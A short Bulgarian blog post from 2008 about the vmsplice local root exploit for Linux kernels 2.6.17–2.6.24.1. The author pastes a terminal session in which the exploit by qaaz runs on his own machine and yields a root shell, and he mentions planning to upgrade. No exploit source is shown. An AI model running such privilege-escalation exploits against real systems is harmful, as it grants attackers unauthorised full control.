vmsplice() - и аз съм под ножа
Thursday, April 17th, 2008Научих за поредния страховит локален експлойт за Linux kernel 2.6.17 - 2.6.24.1
Текущо съм с 2.6.23.9, но вече мисля за ъпгрейд
Причината е очевадна:
(21:46:26)[ivanatora@~]$ ./local
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7fa2000 .. 0xb7fd4000
[+] root
(22:03:41)[root@~]#
При някои от хората долкадвали бъга това работи, при други - не. Който хоства акаунти сигурно вече в крак и е пачнал, така че надали казвам нещо ново на някого ![]()
